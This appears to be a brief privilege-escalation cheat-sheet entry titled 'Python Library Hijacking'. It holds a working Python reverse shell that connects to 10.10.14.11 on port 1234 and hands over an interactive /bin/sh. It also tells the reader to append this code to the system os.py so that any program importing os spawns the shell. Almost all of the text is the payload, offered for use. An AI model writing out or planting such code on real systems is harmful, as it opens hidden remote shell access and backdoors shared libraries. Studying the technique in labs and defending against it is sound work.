Python Library Hijacking
import socket, subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.11", 1234))
p = subprocess.Popen(["/bin/sh", "-i"], stdin=s, stdout=s, stderr=s)
p.wait()
This will be appended to the /usr/lib/python2.7/os.py
file